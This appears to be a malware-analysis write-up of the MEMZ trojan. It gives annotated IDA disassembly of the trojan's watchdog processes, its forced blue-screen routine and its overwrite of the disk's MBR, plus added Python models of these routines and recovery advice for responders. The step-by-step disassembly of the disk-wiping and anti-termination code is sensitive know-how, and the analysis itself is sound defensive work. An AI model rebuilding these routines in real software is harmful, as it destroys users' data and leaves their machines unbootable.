System: Windows 7 Service Pack 1
Analysis tool: IDA (32-bit)
Running the sample pops up two warning dialogs telling the user about the risk of running the virus; once OK is clicked the virus starts running.
After the second OK, notepad opens
and the system starts misbehaving; Task Manager shows six processes belonging to the virus.
At the same time a browser pops up, the mouse jitters, windows flip colour and assorted warning sounds play.
Killing one of the virus processes, or trying to reboot, triggers a flood of pop-ups followed by a blue screen, and because the MBR has already been overwritten, every boot after that loops the Nyan Cat animation forever.
That is the whole course of a run.
The program calls GetSystemMetrics to read the screen width and height, then looks at its command-line arguments. On the first run there are none, so it jumps to loc_40144F.

loc_40144F shows two dialogs warning the user about the risk of running the virus (uType 0x34 = MB_YESNO | MB_ICONWARNING) and checks that the user clicked Yes (MessageBoxA returns IDYES = 6) both times. If so, it calls LocalAlloc for a heap buffer, GetModuleFileNameW for the full path of its own executable, and then launches six more MEMZ processes from that path: ShellExecuteW in a loop five times with the argument /watchdog, and ShellExecuteExW once with /main. That is where the six virus processes seen in Task Manager during the quick run-through come from. The /main launch goes through ShellExecuteExW with fMask 0x40 (SEE_MASK_NOCLOSEPROCESS) so that a process handle is returned, and that handle is passed to SetPriorityClass with 0x80 (HIGH_PRIORITY_CLASS) to raise the priority of the /main process.
```asm
.text:0040144F loc_40144F:                             ; CODE XREF: start+37↑j
.text:0040144F                 mov     esi, ds:MessageBoxA
.text:00401455                 mov     edi, offset Caption ; "MEMZ"
.text:0040145A                 push    34h ; '4'       ; uType
.text:0040145C                 push    edi             ; lpCaption
.text:0040145D                 push    offset Text     ; "The software you just executed is consi"...
.text:00401462                 push    ebx             ; hWnd
.text:00401463                 call    esi ; MessageBoxA
.text:00401465                 cmp     eax, 6          ; IDYES
.text:00401468                 jnz     loc_4014F6
.text:0040146E                 push    34h ; '4'       ; uType
.text:00401470                 push    edi             ; lpCaption
.text:00401471                 push    offset aThisIsTheLastW ; "THIS IS THE LAST WARNING!\r\n\r\nTHE CR"...
.text:00401476                 push    ebx             ; hWnd
.text:00401477                 call    esi ; MessageBoxA
.text:00401479                 cmp     eax, 6
.text:0040147C                 jnz     short loc_4014F6
.text:0040147E                 push    4000h           ; uBytes
.text:00401483                 push    40h ; '@'       ; uFlags
.text:00401485                 call    ds:LocalAlloc   ; allocate 0x4000 bytes from the heap
.text:0040148B                 push    2000h           ; nSize
.text:00401490                 mov     esi, eax
.text:00401492                 push    esi             ; lpFilename
.text:00401493                 push    ebx             ; hModule
.text:00401494                 call    ds:GetModuleFileNameW ; full path of the running executable
.text:0040149A                 push    5
.text:0040149C                 pop     edi
.text:0040149D
.text:0040149D loc_40149D:                             ; CODE XREF: start+284↓j
.text:0040149D                 push    0Ah             ; nShowCmd
.text:0040149F                 push    ebx             ; lpDirectory
.text:004014A0                 push    offset String2  ; "/watchdog"
.text:004014A5                 push    esi             ; lpFile
.text:004014A6                 push    ebx             ; lpOperation
.text:004014A7                 push    ebx             ; hwnd
.text:004014A8                 call    ds:ShellExecuteW
.text:004014AE                 sub     edi, 1
.text:004014B1                 jnz     short loc_40149D ; loop: launch /watchdog 5 times
.text:004014B3                 lea     eax, [ebp+pExecInfo]
.text:004014B6                 mov     [ebp+pExecInfo.cbSize], 3Ch ; '<'
.text:004014BD                 push    eax             ; pExecInfo
.text:004014BE                 mov     [ebp+pExecInfo.lpFile], esi
.text:004014C1                 mov     [ebp+pExecInfo.lpParameters], offset aMain ; "/main"
.text:004014C8                 mov     [ebp+pExecInfo.fMask], 40h ; '@' ; SEE_MASK_NOCLOSEPROCESS
.text:004014CF                 mov     [ebp+pExecInfo.hwnd], ebx
.text:004014D2                 mov     [ebp+pExecInfo.lpVerb], ebx
.text:004014D5                 mov     [ebp+pExecInfo.lpDirectory], ebx
.text:004014D8                 mov     [ebp+pExecInfo.hInstApp], ebx
.text:004014DB                 mov     [ebp+pExecInfo.nShow], 0Ah
.text:004014E2                 call    ds:ShellExecuteExW ; launch /main once
.text:004014E8                 push    80h ; '€'       ; dwPriorityClass (HIGH_PRIORITY_CLASS)
.text:004014ED                 push    [ebp+pExecInfo.hProcess] ; hProcess
.text:004014F0                 call    ds:SetPriorityClass ; raise /main priority
.text:004014F6
.text:004014F6 loc_4014F6:                             ; CODE XREF: start+23B↑j
.text:004014F6                                         ; start+24F↑j
.text:004014F6                 push    ebx
.text:004014F7                 jmp     loc_40132B
```
Whether a dialog was declined or the six children were launched, execution reaches loc_4014F6, pushes ebx (0) as the exit code and calls ExitProcess, so the original process exits.
After the start section above, the program first checks whether it was launched as a MEMZ process with the /watchdog argument (lstrcmpW against argv[1]). If so, it creates a thread running sub_40114A, then calls RegisterClassExA to register a window class and CreateWindowExA to create an invisible 100x100 window (dwStyle 0, no WS_VISIBLE), and spins in a GetMessageW / TranslateMessage / DispatchMessageW loop.

IDA has labelled the structure with pExecInfo field names because the stack slot is reused; it is actually a WNDCLASSEXA (cbSize = 0x30) whose lpfnWndProc is sub_401000 and whose lpszClassName is "hax". sub_401000 is the window procedure that, as the comment notes, fires when the user tries to shut down or reboot (presumably on WM_QUERYENDSESSION), which is how the watchdog processes get to react to a shutdown attempt.
```asm
.text:0040126A                 push    offset String2  ; "/watchdog"
.text:0040126F                 push    dword ptr [eax+4] ; lpString1 (argv[1])
.text:00401272                 call    ds:lstrcmpW
.text:00401278                 test    eax, eax
.text:0040127A                 jnz     loc_401308
.text:00401280                 push    ebx             ; lpThreadId
.text:00401281                 push    ebx             ; dwCreationFlags
.text:00401282                 push    ebx             ; lpParameter
.text:00401283                 push    offset sub_40114A ; lpStartAddress
.text:00401288                 push    ebx             ; dwStackSize
.text:00401289                 push    ebx             ; lpThreadAttributes
.text:0040128A                 call    ds:CreateThread ; watchdog thread
.text:00401290                 lea     eax, [ebp+pExecInfo.lpVerb] ; really a WNDCLASSEXA overlapping pExecInfo
.text:00401293                 mov     [ebp+pExecInfo.lpVerb], 30h ; '0' ; cbSize = sizeof(WNDCLASSEXA)
.text:0040129A                 mov     esi, offset ClassName ; "hax"
.text:0040129F                 mov     [ebp+pExecInfo.lpParameters], offset sub_401000 ; lpfnWndProc: fires when the user tries to reboot or shut down
.text:004012A6                 push    eax             ; WNDCLASSEXA *
.text:004012A7                 mov     dword ptr [ebp+pExecInfo.anonymous_0], esi ; lpszClassName
.text:004012AA                 mov     [ebp+pExecInfo.lpFile], ebx
.text:004012AD                 mov     [ebp+pExecInfo.lpDirectory], ebx
.text:004012B0                 mov     [ebp+pExecInfo.nShow], ebx
.text:004012B3                 mov     [ebp+pExecInfo.hInstApp], ebx
.text:004012B6                 mov     [ebp+pExecInfo.lpIDList], ebx
.text:004012B9                 mov     [ebp+pExecInfo.lpClass], ebx
.text:004012BC                 mov     [ebp+pExecInfo.hkeyClass], ebx
.text:004012BF                 mov     [ebp+pExecInfo.dwHotKey], ebx
.text:004012C2                 mov     [ebp+pExecInfo.hProcess], ebx
.text:004012C5                 call    ds:RegisterClassExA ; register the window class
.text:004012CB                 push    ebx             ; lpParam
.text:004012CC                 push    ebx             ; hInstance
.text:004012CD                 push    ebx             ; hMenu
.text:004012CE                 push    ebx             ; hWndParent
.text:004012CF                 push    64h ; 'd'       ; nHeight
.text:004012D1                 push    64h ; 'd'       ; nWidth
.text:004012D3                 push    ebx             ; Y
.text:004012D4                 push    ebx             ; X
.text:004012D5                 push    ebx             ; dwStyle
.text:004012D6                 push    ebx             ; lpWindowName
.text:004012D7                 push    esi             ; lpClassName
.text:004012D8                 push    ebx             ; dwExStyle
.text:004012D9                 call    ds:CreateWindowExA ; create the (invisible) window
.text:004012DF                 mov     esi, ds:GetMessageW ; message loop
.text:004012E5                 jmp     short loc_4012FB
.text:004012E7 ; ---------------------------------------------------------------------------
.text:004012E7
.text:004012E7 loc_4012E7:                             ; CODE XREF: start+D9↓j
.text:004012E7                 lea     eax, [ebp+Msg]
.text:004012EA                 push    eax             ; lpMsg
.text:004012EB                 call    ds:TranslateMessage
.text:004012F1                 lea     eax, [ebp+Msg]
.text:004012F4                 push    eax             ; lpMsg
.text:004012F5                 call    ds:DispatchMessageW
.text:004012FB
.text:004012FB loc_4012FB:                             ; CODE XREF: start+B8↑j
.text:004012FB                 push    ebx             ; wMsgFilterMax
.text:004012FC                 push    ebx             ; wMsgFilterMin
.text:004012FD                 push    ebx             ; hWnd
.text:004012FE                 lea     eax, [ebp+Msg]
.text:00401301                 push    eax             ; lpMsg
.text:00401302                 call    esi ; GetMessageW
.text:00401304                 test    eax, eax
.text:00401306                 jg      short loc_4012E7
```
start launched five MEMZ processes with /watchdog, so there are five of these threads, one per watchdog process.

The thread first calls LocalAlloc for a 0x200-byte buffer to hold a path, then GetCurrentProcess for its own handle and GetProcessImageFileNameA to get its own image path (in NT device form, \Device\HarddiskVolumeN\...). It then enters an endless loop: Sleep, CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS) to snapshot the process list, Process32FirstW / Process32NextW to walk it, and for every entry OpenProcess(PROCESS_QUERY_INFORMATION), GetProcessImageFileNameA and an exact lstrcmpA against its own path. esi counts the MEMZ processes seen in the current pass and var_C holds the count from the previous pass. If esi < var_C (signed compare; jge skips the call) a virus process has disappeared, and the thread calls sub_401021, which creates 20 threads that flood the screen with message boxes carrying random text at random positions, then blue-screens and shuts the machine down.

Two details matter for anyone trying to clean this up. var_C starts at 0, so the first pass never fires, and the first Sleep is 1000 ms but every later pass pushes 0Ah, so the check repeats every 10 ms in each of the five watchdogs. The count is by image path, so the /main process, and any further copy of the binary launched by hand, count too, and terminating any one of them drops the count. The safe order is to suspend all six processes first (a suspended watchdog cannot run its check) and terminate them afterwards.
```asm
.text:0040114A sub_40114A      proc near               ; DATA XREF: start+56↓o
.text:0040114A
.text:0040114A pe              = PROCESSENTRY32W ptr -23Ch
.text:0040114A lpString1       = dword ptr -10h
.text:0040114A var_C           = dword ptr -0Ch
.text:0040114A lpString2       = dword ptr -8
.text:0040114A hObject         = dword ptr -4
.text:0040114A lpThreadParameter= dword ptr  8
.text:0040114A
.text:0040114A                 push    ebp
.text:0040114B                 mov     ebp, esp
.text:0040114D                 sub     esp, 23Ch
.text:00401153                 push    ebx
.text:00401154                 push    esi
.text:00401155                 xor     ebx, ebx
.text:00401157                 push    edi
.text:00401158                 mov     [ebp+var_C], ebx ; previous count starts at 0
.text:0040115B                 mov     ebx, 200h
.text:00401160                 push    ebx             ; uBytes
.text:00401161                 push    40h ; '@'       ; uFlags
.text:00401163                 call    ds:LocalAlloc   ; 0x200-byte heap buffer for our own image path
.text:00401169                 push    ebx
.text:0040116A                 push    eax
.text:0040116B                 mov     [ebp+lpString1], eax
.text:0040116E                 call    ds:GetCurrentProcess ; own process handle
.text:00401174                 push    eax
.text:00401175                 call    GetProcessImageFileNameA ; own image path
.text:0040117A                 push    3E8h            ; dwMilliseconds
.text:0040117F                                         ; outer loop
.text:0040117F while_Begin:                            ; CODE XREF: sub_40114A+DE↓j
.text:0040117F                 call    ds:Sleep        ; 1000 ms the first time, 10 ms afterwards
.text:00401185                 push    0               ; th32ProcessID
.text:00401187                 push    2               ; dwFlags (TH32CS_SNAPPROCESS)
.text:00401189                 call    CreateToolhelp32Snapshot
.text:0040118E                 mov     edi, eax
.text:00401190                 mov     [ebp+pe.dwSize], 22Ch
.text:0040119A                 lea     eax, [ebp+pe]
.text:004011A0                 push    eax             ; lppe
.text:004011A1                 push    edi             ; hSnapshot
.text:004011A2                 call    Process32FirstW
.text:004011A7                 mov     ebx, [ebp+lpString1]
.text:004011AA                 xor     esi, esi
.text:004011AC                                         ; inner loop: count processes with the same image path
.text:004011AC _dowhile_Begin:                         ; CODE XREF: sub_40114A+C6↓j
.text:004011AC                 push    [ebp+pe.th32ProcessID] ; dwProcessId
.text:004011B2                 push    0               ; bInheritHandle
.text:004011B4                 push    400h            ; dwDesiredAccess (PROCESS_QUERY_INFORMATION)
.text:004011B9                 call    ds:OpenProcess
.text:004011BF                 push    200h            ; uBytes
.text:004011C4                 push    40h ; '@'       ; uFlags
.text:004011C6                 mov     [ebp+hObject], eax
.text:004011C9                 call    ds:LocalAlloc
.text:004011CF                 push    200h
.text:004011D4                 push    eax
.text:004011D5                 push    [ebp+hObject]
.text:004011D8                 mov     [ebp+lpString2], eax
.text:004011DB                 call    GetProcessImageFileNameA
.text:004011E0                 push    [ebp+lpString2] ; lpString2
.text:004011E3                 push    ebx             ; lpString1
.text:004011E4                 call    ds:lstrcmpA     ; exact, case-sensitive compare
.text:004011EA                 test    eax, eax
.text:004011EC                 jnz     short loc_4011EF
.text:004011EE                 inc     esi             ; another MEMZ process found
.text:004011EF
.text:004011EF loc_4011EF:                             ; CODE XREF: sub_40114A+A2↑j
.text:004011EF                 push    [ebp+hObject]   ; hObject
.text:004011F2                 call    ds:CloseHandle
.text:004011F8                 push    [ebp+lpString2] ; hMem
.text:004011FB                 call    ds:LocalFree
.text:00401201                 lea     eax, [ebp+pe]
.text:00401207                 push    eax             ; lppe
.text:00401208                 push    edi             ; hSnapshot
.text:00401209                 call    Process32NextW
.text:0040120E                 test    eax, eax
.text:00401210                 jnz     short _dowhile_Begin
.text:00401212                 push    edi             ; hObject
.text:00401213                 call    ds:CloseHandle
.text:00401219                 cmp     esi, [ebp+var_C] ; compare with the previous pass
.text:0040121C                 jge     short loc_401223 ; esi < var_C -> a copy was killed -> sub_401021
.text:0040121E                 call    sub_401021
.text:00401223
.text:00401223 loc_401223:                             ; CODE XREF: sub_40114A+D2↑j
.text:00401223                 mov     [ebp+var_C], esi ; save this pass's count
.text:00401226                 push    0Ah             ; dwMilliseconds for the next Sleep (10 ms)
.text:00401228                 jmp     while_Begin
.text:00401228 sub_40114A      endp
```
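To reason about the trigger condition without running the sample, here is an offline model of the counting loop above. It is an added example, not code from the post or from MEMZ: the process snapshots, PIDs and image path are constructed, `None` stands for a process that OpenProcess refuses to open, and the comparison mirrors the `cmp esi, var_C` / `jge` pair.

```python
"""Model of the MEMZ watchdog loop (sub_40114A) over constructed process snapshots.

Added example, not code from the original post or from the MEMZ sample. It
re-implements the counting logic the disassembly shows so the trigger
condition can be reasoned about offline. Every snapshot below is constructed
for the example; image paths are in the NT device form that
GetProcessImageFileNameA returns, and None models a process that
OpenProcess(PROCESS_QUERY_INFORMATION) could not open.
"""

SELF_IMAGE = r"\Device\HarddiskVolume1\Users\lab\Desktop\MEMZ.exe"  # constructed

# (pid, image path) pairs for the unrelated processes in every snapshot.
BASE = [
    (4, None),                                                     # System
    (420, r"\Device\HarddiskVolume1\Windows\System32\csrss.exe"),
    (1200, r"\Device\HarddiskVolume1\Windows\explorer.exe"),
]
MEMZ_PIDS = [3001, 3002, 3003, 3004, 3005, 3006]   # 5 x /watchdog + 1 x /main


def count_same_image(snapshot, self_image):
    """Inner loop: esi = number of processes whose image path equals ours.

    lstrcmpA is an exact, case-sensitive compare, so only a byte-identical
    path counts, and unopenable processes contribute nothing.
    """
    return sum(1 for _pid, image in snapshot if image is not None and image == self_image)


def watchdog_step(prev_count, snapshot, self_image=SELF_IMAGE):
    """One pass of the outer loop: returns (triggered, new_count).

    `cmp esi, var_C; jge skip` means sub_401021 (pop-ups + BSOD) runs only when
    this pass saw fewer copies than the previous one. var_C starts at 0, so
    the first pass can never fire.
    """
    current = count_same_image(snapshot, self_image)
    return current < prev_count, current


def run_watchdog(snapshots, self_image=SELF_IMAGE):
    """Feed successive snapshots through the loop and return the 0-based index
    of the pass that triggers, or None if none does."""
    prev = 0
    for i, snap in enumerate(snapshots):
        fired, prev = watchdog_step(prev, snap, self_image)
        if fired:
            return i
    return None


def memz_snapshot(pids):
    """Constructed snapshot: the base processes plus one MEMZ copy per pid."""
    return BASE + [(pid, SELF_IMAGE) for pid in pids]


# Scenario 1: a responder kills the copies one at a time (Task Manager style).
ONE_AT_A_TIME = [
    memz_snapshot(MEMZ_PIDS),        # pass 0: 6 copies, var_C = 0 -> no trigger
    memz_snapshot(MEMZ_PIDS),        # pass 1: 6 == 6
    memz_snapshot(MEMZ_PIDS[1:]),    # pass 2: 5 < 6 -> the surviving watchdogs fire
]

# Scenario 2: an extra copy started by hand raises the count harmlessly, but
# killing that extra copy afterwards fires anyway: the check is by image path.
EXTRA_COPY_THEN_KILL = [
    memz_snapshot(MEMZ_PIDS),            # 6
    memz_snapshot(MEMZ_PIDS + [3007]),   # 7 >= 6
    memz_snapshot(MEMZ_PIDS),            # 6 < 7 -> trigger
]

if __name__ == "__main__":
    print("one at a time   ->", run_watchdog(ONE_AT_A_TIME))
    print("extra copy kill ->", run_watchdog(EXTRA_COPY_THEN_KILL))
    print("steady state    ->", run_watchdog([memz_snapshot(MEMZ_PIDS)] * 5))
```

Scenario 1 fires on the third pass, when the count drops from 6 to 5, which is what killing the processes one by one from Task Manager looks like to the malware. Scenario 2 shows why starting extra copies does not help: the count goes up without consequence, but the moment any process with that image path goes away the surviving watchdogs fire. With five watchdogs each re-checking every 10 ms, suspending all of them before terminating anything is the only order that does not race the check.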
Once inside sub_401021, it immediately creates 20 threads, 0.1 s apart, with StartAddress as the thread routine.
It then calls RtlAdjustPrivilege to enable the required privilege and NtRaiseHardError to force a blue screen, and after that OpenProcessToken to get the process token, AdjustTokenPrivileges to enable the shutdown privilege on it, and ExitWindowsEx to end the session.

StartAddress first installs a hook with callback fn, then uses sub_401A55 to get a random number. 26 messages are stored in the table at lpText; the random number modulo 0x1A (26) is left in edx and selects one of them, which is shown with MessageBoxA, so each of the 20 threads pops up one of the 26 messages.
lpText: the message table
sub_401A55: the random number function
The callback: if the user tries to shut down or reboot, the blue-screen/shutdown function above is called.
In summary, when the argument is /watchdog, a thread is created that watches whether any of the virus's own processes have been terminated; if the count drops it calls the blue-screen/shutdown function, and an attempted shutdown or reboot calls the same function through the window procedure.
The /main branch starts by calling CreateFileA to open \\.\PhysicalDrive0 (the first physical disk) with GENERIC_READ | GENERIC_WRITE (0xC0000000) and OPEN_EXISTING, and overwrites the original MBR with its own code. That is where the Nyan Cat animation seen on every reboot after running the virus comes from.

Concretely, it allocates a zero-filled 0x10000-byte buffer (LMEM_ZEROINIT), copies dword_4029E8 bytes from byte_402118 to offset 0 and dword_4029EC bytes from byte_402248 to offset 0x1FE, and writes the whole 64 KiB (128 sectors) to the start of the disk with a single WriteFile. Offset 0x1FE is where the 0x55 0xAA boot signature lives, so the second blob has to begin with that marker for the BIOS to keep treating sector 0 as bootable. The original sector is never read back, so the partition table at 0x1BE..0x1FD is destroyed either way, by stage-one bytes or by the zero fill. Opening a physical drive for writing needs administrator rights; without elevation CreateFileA returns INVALID_HANDLE_VALUE and the process exits with code 2, and a failed write exits with code 3.
```asm
.text:00401308 loc_401308:                             ; CODE XREF: start+4D↑j
.text:00401308                 push    ebx             ; hTemplateFile
.text:00401309                 push    ebx             ; dwFlagsAndAttributes
.text:0040130A                 push    3               ; dwCreationDisposition (OPEN_EXISTING)
.text:0040130C                 push    ebx             ; lpSecurityAttributes
.text:0040130D                 push    3               ; dwShareMode (READ | WRITE)
.text:0040130F                 push    0C0000000h      ; dwDesiredAccess (GENERIC_READ | GENERIC_WRITE)
.text:00401314                 push    offset FileName ; "\\\\.\\PhysicalDrive0"
.text:00401319                 call    ds:CreateFileA
.text:0040131F                 mov     ebx, eax
.text:00401321                 mov     [ebp+hObject], ebx
.text:00401324                 cmp     ebx, 0FFFFFFFFh ; INVALID_HANDLE_VALUE (e.g. not elevated)
.text:00401327                 jnz     short loc_401331
.text:00401329                 push    2               ; uExitCode
.text:0040132B
.text:0040132B loc_40132B:                             ; CODE XREF: start+170↓j
.text:0040132B                                         ; start+1A3↓j ...
.text:0040132B                 call    ds:ExitProcess
.text:00401331 ; ---------------------------------------------------------------------------
.text:00401331
.text:00401331 loc_401331:                             ; CODE XREF: start+FA↑j
.text:00401331                 push    10000h          ; uBytes
.text:00401336                 push    40h ; '@'       ; uFlags (LMEM_ZEROINIT)
.text:00401338                 call    ds:LocalAlloc   ; 64 KiB zero-filled buffer = 128 sectors
.text:0040133E                 xor     edi, edi
.text:00401340                 mov     esi, eax
.text:00401342                 cmp     ds:dword_4029E8, edi
.text:00401348                 jbe     short loc_401362
.text:0040134A                 mov     edx, offset byte_402118
.text:0040134F                 mov     ecx, esi
.text:00401351                 sub     edx, esi
.text:00401353
.text:00401353 loc_401353:                             ; CODE XREF: start+133↓j
.text:00401353                 mov     al, [edx+ecx]   ; copy byte_402118[0..dword_4029E8) to offset 0
.text:00401356                 inc     edi
.text:00401357                 mov     [ecx], al
.text:00401359                 inc     ecx
.text:0040135A                 cmp     edi, ds:dword_4029E8
.text:00401360                 jb      short loc_401353
.text:00401362
.text:00401362 loc_401362:                             ; CODE XREF: start+11B↑j
.text:00401362                 xor     ecx, ecx
.text:00401364                 cmp     ds:dword_4029EC, ecx
.text:0040136A                 jbe     short loc_401382
.text:0040136C
.text:0040136C loc_40136C:                             ; CODE XREF: start+153↓j
.text:0040136C                 mov     al, ds:byte_402248[ecx] ; copy byte_402248[0..dword_4029EC) to offset 0x1FE
.text:00401372                 mov     [esi+ecx+1FEh], al
.text:00401379                 inc     ecx
.text:0040137A                 cmp     ecx, ds:dword_4029EC
.text:00401380                 jb      short loc_40136C
.text:00401382
.text:00401382 loc_401382:                             ; CODE XREF: start+13D↑j
.text:00401382                 push    0               ; lpOverlapped
.text:00401384                 lea     eax, [ebp+NumberOfBytesWritten]
.text:00401387                 push    eax             ; lpNumberOfBytesWritten
.text:00401388                 push    10000h          ; nNumberOfBytesToWrite
.text:0040138D                 push    esi             ; lpBuffer
.text:0040138E                 push    ebx             ; hFile
.text:0040138F                 mov     ebx, ds:WriteFile
.text:00401395                 call    ebx ; WriteFile ; overwrite the first 128 sectors of the disk
.text:00401397                 test    eax, eax
.text:00401399                 jnz     short loc_40139F
.text:0040139B                 push    3               ; uExitCode
.text:0040139D                 jmp     short loc_40132B
.text:0040139F ; ---------------------------------------------------------------------------
.text:0040139F
.text:0040139F loc_40139F:                             ; CODE XREF: start+16C↑j
.text:0040139F                 push    [ebp+hObject]   ; hObject
.text:004013A2                 mov     edi, ds:CloseHandle
.text:004013A8                 call    edi ; CloseHandle
```
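An offline reconstruction of what the loop above puts on disk, together with the check a responder would run against a backup of sector 0 taken before the reboot. This is an added example, not code from the post or from the sample: the two stage blobs are constructed placeholders (the page does not reproduce byte_402118 or byte_402248), and the "clean" sector is constructed too.

```python
r"""MBR overwrite in the /main branch, modelled offline.

Added example, not code from the post or the MEMZ sample. build_boot_image()
mirrors the two copy loops and the single 0x10000-byte WriteFile shown above.
The stage blobs and the clean sector are constructed stand-ins, not the real
boot code. mbr_report() is what a responder would run against a backup of
sector 0 (e.g. a Windows dd port reading \\.\PhysicalDrive0, 512 bytes).
"""

SECTOR = 512
IMAGE_SIZE = 0x10000           # LocalAlloc(LMEM_ZEROINIT, 0x10000) -> 128 sectors
STAGE2_OFFSET = 0x1FE          # second blob lands on the boot-signature offset
PARTITION_TABLE = slice(0x1BE, 0x1FE)
BOOT_SIG = b"\x55\xAA"


def build_boot_image(stage1: bytes, stage2: bytes) -> bytes:
    r"""Reproduce the buffer the sample writes to \\.\PhysicalDrive0.

    Loop 1 copies stage1 (byte_402118, dword_4029E8 bytes) to offset 0;
    loop 2 copies stage2 (byte_402248, dword_4029EC bytes) to offset 0x1FE;
    everything else stays zero because the buffer was LMEM_ZEROINIT.
    """
    if len(stage1) > IMAGE_SIZE or STAGE2_OFFSET + len(stage2) > IMAGE_SIZE:
        raise ValueError("blob does not fit the 64 KiB buffer")
    buf = bytearray(IMAGE_SIZE)
    buf[: len(stage1)] = stage1
    buf[STAGE2_OFFSET : STAGE2_OFFSET + len(stage2)] = stage2
    return bytes(buf)


def mbr_report(sector0: bytes, backup_sector0: bytes) -> dict:
    """Compare the current sector 0 with a known-good backup of it."""
    if len(sector0) != SECTOR or len(backup_sector0) != SECTOR:
        raise ValueError("need exactly one 512-byte sector each")
    runs = []                                    # [start, end) byte ranges that differ
    for i in range(SECTOR):
        if sector0[i] == backup_sector0[i]:
            continue
        if runs and runs[-1][1] == i:
            runs[-1][1] = i + 1
        else:
            runs.append([i, i + 1])
    return {
        "boot_signature_ok": sector0[0x1FE:0x200] == BOOT_SIG,
        "partition_table_intact": sector0[PARTITION_TABLE] == backup_sector0[PARTITION_TABLE],
        "bootstrap_code_modified": any(start < 0x1BE for start, _ in runs),
        "changed_ranges": [(hex(s), hex(e)) for s, e in runs],
    }


# --- constructed demo data (not the real MEMZ bytes) --------------------------
# A clean sector 0: bootstrap code, one partition entry, 55 AA signature.
CLEAN_CODE = b"\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x90" * (0x1BE - 7)
CLEAN_PTABLE = (b"\x80\x20\x21\x00\x07\xFE\xFF\xFF\x00\x08\x00\x00\x00\xF8\x0F\x00"
                + b"\x00" * 48)
CLEAN_MBR = CLEAN_CODE + CLEAN_PTABLE + BOOT_SIG
assert len(CLEAN_MBR) == SECTOR

# Stand-ins for the two blobs. The second one begins with 55 AA, which it must
# do if the BIOS is still to accept sector 0 as bootable after the copy to 0x1FE.
DEMO_STAGE1 = b"\xEA\x05\x7C\x00\x00" + b"\x90" * 0x80          # 0x85 bytes
DEMO_STAGE2 = BOOT_SIG + b"\xB8\x13\x00\xCD\x10" + b"\x90" * 0x400

INFECTED_IMAGE = build_boot_image(DEMO_STAGE1, DEMO_STAGE2)
REPORT = mbr_report(INFECTED_IMAGE[:SECTOR], CLEAN_MBR)

if __name__ == "__main__":
    for key, value in REPORT.items():
        print(f"{key}: {value}")
```

The report on the constructed data says what the disassembly implies for the real thing: the signature is still valid, so the machine boots into the payload instead of refusing to boot, while the bootstrap code and the partition table are gone. Restoring a backed-up sector 0 (and the following 127 sectors, since the write covers all of them) is the repair; with the partition table gone, a recovery has to rebuild it from the partition boundaries on disk.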
After overwriting the MBR it creates \note.txt in the root of the current drive (CREATE_ALWAYS), writes the text message into it and opens it with notepad via ShellExecuteA("notepad", "\note.txt"). A failed create exits with code 4 and a failed write with code 5.
```asm
.text:004013AA                 push    0               ; hTemplateFile
.text:004013AC                 push    80h ; '€'       ; dwFlagsAndAttributes (FILE_ATTRIBUTE_NORMAL)
.text:004013B1                 push    2               ; dwCreationDisposition (CREATE_ALWAYS)
.text:004013B3                 push    0               ; lpSecurityAttributes
.text:004013B5                 push    3               ; dwShareMode
.text:004013B7                 push    0C0000000h      ; dwDesiredAccess
.text:004013BC                 push    offset Parameters ; "\\note.txt"
.text:004013C1                 call    ds:CreateFileA
.text:004013C7                 mov     esi, eax
.text:004013C9                 cmp     esi, 0FFFFFFFFh
.text:004013CC                 jnz     short loc_4013D5
.text:004013CE                 push    4               ; uExitCode
.text:004013D0                 jmp     loc_40132B
.text:004013D5 ; ---------------------------------------------------------------------------
.text:004013D5
.text:004013D5 loc_4013D5:                             ; CODE XREF: start+19F↑j
.text:004013D5                 push    0               ; lpOverlapped
.text:004013D7                 lea     eax, [ebp+NumberOfBytesWritten]
.text:004013DA                 push    eax             ; lpNumberOfBytesWritten
.text:004013DB                 push    ds:nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:004013E1                 push    offset aYourComputerHa ; "YOUR COMPUTER HAS BEEN FUCKED BY THE ME"...
.text:004013E6                 push    esi             ; hFile
.text:004013E7                 call    ebx ; WriteFile
.text:004013E9                 test    eax, eax
.text:004013EB                 jnz     short loc_4013F4
.text:004013ED                 push    5               ; uExitCode
.text:004013EF                 jmp     loc_40132B
.text:004013F4 ; ---------------------------------------------------------------------------
.text:004013F4
.text:004013F4 loc_4013F4:                             ; CODE XREF: start+1BE↑j
.text:004013F4                 push    esi             ; hObject
.text:004013F5                 call    edi ; CloseHandle
.text:004013F7                 push    0Ah             ; nShowCmd (SW_SHOWDEFAULT)
.text:004013F9                 xor     ebx, ebx
.text:004013FB                 push    ebx             ; lpDirectory
.text:004013FC                 push    offset Parameters ; "\\note.txt"
.text:00401401                 push    offset File     ; "notepad"
.text:00401406                 push    ebx             ; lpOperation
.text:00401407                 push    ebx             ; hwnd
.text:00401408                 call    ds:ShellExecuteA
```
Next it calls CreateThread ten times, once for each function in the table at off_405130, so the ten payload routines below run in parallel. Each routine returns an integer in eax: a constant (2, 50, 100), a random range (20 + rand % 20, 300 + rand % 400), or a double computed from arg_0 and converted by sub_401B09. The page does not show the thread loop that consumes that value, but its shape (a counter in arg_0 that makes the computed value shrink as it grows) suggests it is the delay before the routine runs again, with arg_0 counting elapsed time.
Thread 1:
Randomly launches one entry from the table below (46 entries on the page): the default browser on one of the search URLs, or calc, notepad, cmd, write, regedit, explorer, taskmgr, msconfig, mspaint, devmgmt.msc, control or mmc.
```asm
.data:00405000                                         ; DATA XREF: sub_4014FC+18↑r
.data:00405000                                         ; "http://google.co.ck/search?q=best+way+t"...
.data:00405004                 dd offset aHttpGoogleCoCk_0 ; "http://google.co.ck/search?q=how+2+remo"...
.data:00405008                 dd offset aHttpGoogleCoCk_1 ; "http://google.co.ck/search?q=mcafee+vs+"...
.data:0040500C                 dd offset aHttpGoogleCoCk_2 ; "http://google.co.ck/search?q=how+to+sen"...
.data:00405010                 dd offset aHttpGoogleCoCk_3 ; "http://google.co.ck/search?q=minecraft+"...
.data:00405014                 dd offset aHttpGoogleCoCk_4 ; "http://google.co.ck/search?q=how+to+get"...
.data:00405018                 dd offset aHttpGoogleCoCk_5 ; "http://google.co.ck/search?q=bonzi+budd"...
.data:0040501C                 dd offset aHttpGoogleCoCk_6 ; "http://google.co.ck/search?q=how+2+buy+"...
.data:00405020                 dd offset aHttpGoogleCoCk_7 ; "http://google.co.ck/search?q=how+to+cod"...
.data:00405024                 dd offset aHttpGoogleCoCk_8 ; "http://google.co.ck/search?q=what+happe"...
.data:00405028                 dd offset aHttpGoogleCoCk_9 ; "http://google.co.ck/search?q=g3t+r3kt"
